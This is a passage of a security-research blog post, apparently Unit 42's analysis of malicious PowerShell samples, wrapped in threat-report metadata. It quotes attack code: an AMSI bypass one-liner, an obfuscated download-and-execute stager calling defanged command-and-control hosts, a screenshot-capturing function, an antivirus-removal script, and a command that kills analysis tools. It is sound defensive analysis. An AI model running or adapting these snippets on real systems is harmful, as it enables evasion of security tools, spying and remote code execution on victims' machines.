Ideally, the application (PowerShell in this context) will take the\r\nscript at runtime, after it’s deobfuscated or pulled in remotely from a website, and pass it through AMSI to your AV for\r\nscanning. If the AV software determines it’s malicious, it can now block the script’s execution.\r\n#YAOMG (Yet Another of Matt Graebers)\r\nMatt Graeber released a one-line tweet that shows how you can bypass AMSI by simply changing “amsiInitFailed” to\r\n“True”, which makes it appear as if it failed to load and effectively skips this check.\r\n[ReF].ASSEmbly.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIElD('amsiInitFailed','NonPublic,Static').SetVAlue($Nu\r\nSystem.NET.WebClieNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.ADD('User-Agent',$u);$wC\r\n[SYSteM.NEt.CReDentIalCAcHe]::DeFAulTNetwORKCREdEntialS;$K=[SySTEm.TexT.EncodING]::ASCII.GETBYteS('Dv,inKZ<@{3mjG4&\r\n($J+$S[$_]+$K[$_%$K.COuNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I\r\nBxor$S[($S[$I]+$S[$H])%256]}};$Wc.HEaDERs.ADD(\"Cookie\",\"session=Pu8sEnIpxIwINbUOVsxlL66DoHA=\");$ser='http://35.165.38[.]15:80'\r\nJoIn[CHAr[]](& $R $data ($IV+$K))|IEX\r\nThe code shares a similar signature to PowerShell Empire’s XOR routine for their EncryptedScriptDropper and may be\r\nrelated or borrowed code.\r\nPowerSploit GTS (3 Samples – 0.07% Coverage)\r\nThis is a set of samples that simply use a module from another tool, in this case the PowerSploit Get-TimedScreenshot. 
The\r\ncode will take a screenshot using Drawing.Bitmap every 2 seconds.\r\nfunction Get-TimedScreenshot\r\n{\r\n    [CmdletBinding()] Param(\r\n        [Parameter(Mandatory=$True)]\r\n        [ValidateScript({Test-Path -Path $_ })]\r\n        [String] $Path,\r\n        [Parameter(Mandatory=$True)]\r\n        [Int32] $Interval,\r\n        [Parameter(Mandatory=$True)]\r\n        [String] $EndTime\r\n    )\r\n    Function Get-Screenshot {\r\n       $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen\r\n       $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height\r\n       $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)\r\n       $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty,\r\n$ScreenBounds.Size)\r\n       $DrawingGraphics.Dispose()\r\n       $ScreenshotObject.Save($FilePath)\r\n       $ScreenshotObject.Dispose()\r\n    }\r\n    Try {\r\n        #load required assembly\r\n        Add-Type -Assembly System.Windows.Forms\r\n        Do {\r\n            #get the current time and build the filename from it\r\n            $Time = (Get-Date)\r\n            [String] $FileName = \"$($Time.Month)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Day)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Year)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Hour)\"\r\n            $FileName += '-'\r\n            $FileName += \"$($Time.Minute)\"\r\n            $FileName += '-'\r\n            $FileName += 
\"$($Time.Second)\"\r\n            $FileName += '.png'\r\n            [String] $FilePath = (Join-Path $Path $FileName)\r\n            Get-Screenshot\r\n            Start-Sleep -Seconds $Interval\r\n        }\r\n        While ((Get-Date -Format HH:mm) -lt $EndTime)\r\n    }\r\n    Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}\r\n}\r\nGet-TimedScreenshot -Path \"$env:userprofile\\Desktop\" -Interval 2 -EndTime 24:00\r\nFor these types of attacks, the PowerShell code is just an augmentation to the overarching suite of tools being used in the\r\nattack, likely intended to save the attacker time in developing the desired functionality. In this case, Microsoft Excel\r\ndocuments contained macros that first launch a function to decode the PowerShell code and begin taking screenshots while a\r\nsecond function is called afterwards to decode a PE file that handles the rest of the attack.\r\nFigure 7 Excel Macro decodes embedded Powershell script and PE file.\r\nRemove AV (2 Samples – 0.05% Coverage)\r\nThis next variant uses PowerShell to forcefully uninstall both x86 and x64 versions of an installed AV application. It iterates\r\nover entries in the Uninstall registry path to find items with “*AVG*” and then quietly uninstalls each instance.\r\n$uninstall32s = gci \"HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" | foreach\r\n{ gp $_.PSPath } | ? { $_ -like \"*AVG*\" } | select UninstallString;$uninstall64s = gci\r\n\"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" | foreach { gp $_.PSPath } | ? 
{ $_ -like\r\n\"*AVG*\" } | select UninstallString;foreach($uninstall64 in $uninstall64s) {$uninstall64 =\r\n$uninstall64.UninstallString -Replace \"MsiExec.exe\",\"\" -Replace \"/I\",\"\" -Replace \"/X\",\"\";$uninstall64 =\r\n$uninstall64.Trim();if($uninstall64 -like \"*/mode=offline*\"){}else{Write-Warning $uninstall64; start-process\r\n\"msiexec.exe\" -args \"/x $uninstall64  /qn /norestart\" -Wait }};foreach($uninstall32 in $uninstall32s) {$uninstall32 =\r\n$uninstall32.UninstallString -Replace \"MsiExec.exe\",\"\" -Replace \"/I\",\"\" -Replace \"/X\",\"\";$uninstall32 =\r\n$uninstall32.Trim();if($uninstall32 -like \"*/mode=offline*\"){}else{Write-Warning $uninstall32; start-process\r\n\"msiexec.exe\" -args \"/x $uninstall32  /qn /norestart\" -Wait }};\r\nNotable One-Offs\r\nAfter identifying as many variants as possible, I was left with around 100 “Unknown” samples, which were usually custom\r\nspins on the techniques described above. I’ll end this cataloging with a quick overview of some of the more notable samples.\r\nHidden Messages\r\nThis sample does some basic date checking through PowerShell and compares current datetime to an included datetime, if\r\nthe current datetime is past the included one, it will not run. 
At the end of the code though, they leave a commented call-out to, possibly, their “hacking” group.\r\nif ((Get-Date).Ticks -lt (Get-Date -Date '18-jan-2017 00:00:00').Ticks) {(New-Object System.Net.WebClient).DownloadFile('http://drobbox-api.dynu[.]com/update',\"$env:temp\\update\");Start-Process pythonw.exe \"$env:temp\\update 31337\"};#NIXU17{pow3r_t0_the_sh3lls}\r\nAnother example of leaving hidden messages is in the sample below.\r\nwhile($true){Start-Sleep -s 120; $m=New-Object System.Net.WebClient;$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials= [System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;$m.Headers.Add('user-agent', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)');\r\niex(($m.downloadstring('https://raw.githubusercontent.com/rollzedice/js/master/drupal.js')));}\r\nWhen you analyze the code it pulls down remotely from GitHub (which, at the time of this writing, kills PowerShell processes), it says “Hello SOC/IR team!  :-)”. It’s possible this is just a pentest or red-team exercise, given the history of the file using “Test” a lot.\r\nFigure 8 JavaScript file kills powershell and greets SOC/IR team.\r\nProcess Killing\r\nThis is another example of using PowerShell for specific purposes in an overarching attack. 
It will kill a number of processes typically associated with malware analysis.\r\nkill -processname Taskmgr, ProcessHacker*, Procmon*, Procexp*, Procdump* -force\r\nLayers of Obfuscation\r\nFor this last example, it appears to be related to the samples shown in the “PowerSploit GTS” variants, as the originating macros are almost identical, but this sample did not use any of the other pieces.\r\nThis particular sample uses multiple layers of obfuscation to carry out its attack.\r\nLayer 1 –\r\nA Microsoft Excel document has a macro that pulls base64-encoded data from a cell and passes it to PowerShell’s EncodedCommand parameter when it launches.\r\nLayer 2 –\r\nThe decoded base64 is a long array of int values that get converted to their char value, and then executed as another PowerShell script.\r\n-JOIn (( 32 ,32 , 36 ,86 ,115 , 110 , 50,108 , 54, 32 ,61 , 32,32 , 91,116,121,112,101, 93 ,40 ,34,123 ,51 , 125 , 123,\r\n48 ,125, 123, 49, 125, ,53, 45 ,49, 54,55 , 45,39, 44 ,39 ,101 , 46 , 97, 109, 97 , 122 ,111,110 ,97, 39, 44, 39 ,53,39,\r\n44,39, 119 , 115, 46, 99 , 111 , 109 ,58, 56 , 48 , 39 ,44 ,39,45 , 119, 101 ,115 , 39,41, 41 , 59)|%{([inT]$_-AS\r\n[chAr]) } ) | iex\r\nLayer 3 –\r\nThe decoded data uses various techniques to obfuscate itself. The first technique is injecting backtick characters between other characters, which will be ignored at runtime. This is similar to the caret injection technique from the command-line, but works within the PowerShell code instead.\r\nIt also uses a technique commonly seen in other scripting languages: breaking up a string into a randomized list and then rebuilding the original string by calling specific values.\r\n$Vsn2l6 =  [type](\"{3}{0}{1}{2}\" -F'UE','S','t','Net.webreq') ;  $h69Q4  =[TYPe](\"{1}{2}{3}{4}{0}\"-F 'he','nEt.C','REDeNtialC','a','c') ;  ${J}=\u0026(\"{0}{1}{2}\"-f 'new-obj','ec','t') (\"{2}{1}{0}{3}\" -f 'eb','.w','net','client');${j}.\"PRo`XY\"=  ( VaRIablE  vsn2L6 ).VaLuE::(\"{0}{3}{2}{4}{1}\"-f'GetS','Proxy','em','yst','Web').Invoke();${j}.\"pr`OXY\".\"C`RE`De`NTiALs\"= (  GeT-VariaBle  H69Q4).VaLUe::\"DE`Faultcred`en`TI`ALS\";.(\"{0}{1}\"-f 'I','EX') ${J}.(\"{1}{3}{2}{0}\" -f 'string','do','load','wn').Invoke((\"{3}{1}{9}{11}{8}{13}{0}{4}{15}{5}{10}{2}{12}{14}{7}{6}\" -f'5','tp://','mput','ht','.us','t','0/anSfrf','8','185-','e','-2.co','c2-35-167-','e.amazona','5','ws[.]com:80','-wes'));\r\nCleaning up the code and building the strings shows that it downloads code remotely to pass to Invoke-Expression.\r\n$Vsn2l6 = [type]Net.webreqUESt;\r\n$h69Q4 = [TYPe]nEt.CREDeNtialCache;\r\n\u0026new-object net.webclient;\r\nPRoXY = $Vsn2l6.VaLuE::GetSystemWebProxy.Invoke();\r\nprOXY.CREDeNTiALs = ( GeT-VariaBle $h69Q4 ).VaLUe::DEFaultcredenTIALS;\r\n.IEX downloadstring.Invoke(http://ec2-35-167-185-55.us-west-2.compute.amazonaws[.]com:8080/anSfrf);\r\nConclusion\r\nPowerShell is a robust scripting framework that offers a lot of capabilities, both for defense and offense. 
Hopefully this blog has served to highlight some of the current techniques being used in tools and attacks.\r\nAcross these samples, it seems clear that the majority of attacks are still relying on public tools, which isn’t surprising. As the PowerShell framework continues to be explored and matured, I suspect we will begin to see a lot more variation in attacks coming from this space. As it stands today, PowerShell seems to be mainly used as a tool to facilitate common functions attackers are used to within other frameworks, but will eventually start to take advantage of more native features once we move out of the “transference” phase to an “innovative” phase.\r\nObserved C2 or Download Sites\r\nDownloader DFSP\r\nPowerShell Empire\r\nDownloader DFSP 2X\r\nDownloader DFSP DPL\r\nDownloader IEXDS\r\nBITSTransfer\r\nTXT C2\r\nDownloader Proxy\r\nDownloader Kraken\r\nPowerWorm\r\nAMSI Bypass\r\nMeterpreter RHTTP\r\nLayers of Obfuscation\r\nSHA1 Hashtag\r\nAdditional hashes to samples can be found here.\r\nSource: https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/"
	],
	"report_names": [
		"unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434538,
	"ts_updated_at": 1775791216,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.pdf",
		"text": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.txt",
		"img": "https://archive.orkl.eu/c5f50fa4f8e7ea98d131b935b5f7b6677147d975.jpg"
	}
}